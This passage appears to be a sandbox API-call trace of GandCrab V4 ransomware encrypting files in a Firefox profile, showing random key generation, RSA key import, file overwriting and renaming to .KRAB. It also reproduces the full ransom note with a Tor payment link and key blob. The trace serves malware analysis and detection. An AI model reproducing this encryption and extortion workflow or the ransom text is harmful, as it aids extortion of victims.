flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.749] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0082.750] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0082.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0082.750] lstrcmpiW (lpString1="revocations.txt", lpString2="desktop.ini") returned 1 [0082.750] lstrcmpiW (lpString1="revocations.txt", lpString2="autorun.inf") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="ntuser.dat") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="iconcache.db") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="bootsect.bak") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="boot.ini") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="ntuser.dat.log") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="thumbs.db") returned -1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="ntldr") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="NTDETECT.COM") returned 1 [0082.757] lstrcmpiW (lpString1="revocations.txt", lpString2="Bootfont.bin") returned 1 [0082.757] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.758] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0082.759] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0082.760] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.760] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.760] CryptGenRandom (in: hProv=0x1012338, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0082.760] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.760] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.761] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0082.762] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0082.762] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.763] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.763] CryptGenRandom (in: hProv=0x1012338, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0082.763] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.763] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.763] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0082.805] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023578) returned 1 [0082.806] CryptGetKeyParam (in: hKey=0x1023578, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.806] CryptEncrypt (in: hKey=0x1023578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.807] GetLastError () returned 0x0 [0082.807] CryptDestroyKey (hKey=0x1023578) returned 1 [0082.807] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.807] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0082.809] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023578) returned 1 [0082.809] CryptGetKeyParam (in: hKey=0x1023578, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.809] CryptEncrypt (in: hKey=0x1023578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.809] GetLastError () returned 0x0 [0082.809] CryptDestroyKey (hKey=0x1023578) returned 1 [0082.809] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.809] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\revocations.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.810] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0082.810] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0082.811] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x53a6, lpOverlapped=0x0) returned 1 [0082.861] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffac5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.861] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x53a6, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x53a6, lpOverlapped=0x0) returned 1 [0082.862] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0082.862] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.866] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.871] CloseHandle (hObject=0x7ec) returned 1 [0082.871] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.872] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\revocations.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\revocations.txt.krab")) returned 1 [0082.873] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.873] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.873] lstrcmpW (lpString1="saved-telemetry-pings", lpString2=".") returned 1 [0082.873] lstrcmpW (lpString1="saved-telemetry-pings", lpString2="..") returned 1 [0082.873] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="saved-telemetry-pings" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings" [0082.873] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\" [0082.873] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0082.873] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.874] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.874] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.874] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.874] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.874] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.874] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\\\KRAB-DECRYPT.txt") returned 119 [0082.874] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.967] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0082.967] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0082.969] CloseHandle (hObject=0x7ec) returned 1 [0082.969] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.970] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.970] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1e, wMilliseconds=0xa7)) [0082.971] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.971] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.971] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.971] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock") returned 125 [0082.971] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0082.983] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.984] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.984] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\") returned 102 [0082.984] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*" [0082.984] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x1022ff8 [0082.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.984] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0082.984] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.984] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0082.984] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0082.984] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0082.984] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock" [0082.984] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.985] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 130 [0082.985] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a08d2ca4dee3d.lock") returned 125 [0082.985] lstrlenW (lpString=".lock") returned 5 [0082.985] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.985] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0082.985] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.986] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.986] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0082.986] lstrcmpW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2=".") returned 1 [0082.986] lstrcmpW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="..") returned 1 [0082.986] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="d896fec9-1a7a-4db1-a3a2-e46d95b631a5" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5" [0082.986] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.986] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.KRAB") returned 143 [0082.987] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0082.987] lstrlenW (lpString=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 67 [0082.987] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.987] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5 ") returned 68 [0082.987] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.987] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0082.987] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5") returned 138 [0082.987] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="desktop.ini") returned -1 [0082.987] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="autorun.inf") returned 1 [0082.987] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="ntuser.dat") returned -1 [0082.987] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="iconcache.db") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="bootsect.bak") returned 1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="boot.ini") returned 1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="ntuser.dat.log") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="thumbs.db") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="KRAB-DECRYPT.html") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="ntldr") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="NTDETECT.COM") returned -1 [0082.988] lstrcmpiW (lpString1="d896fec9-1a7a-4db1-a3a2-e46d95b631a5", lpString2="Bootfont.bin") returned 1 [0082.988] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, 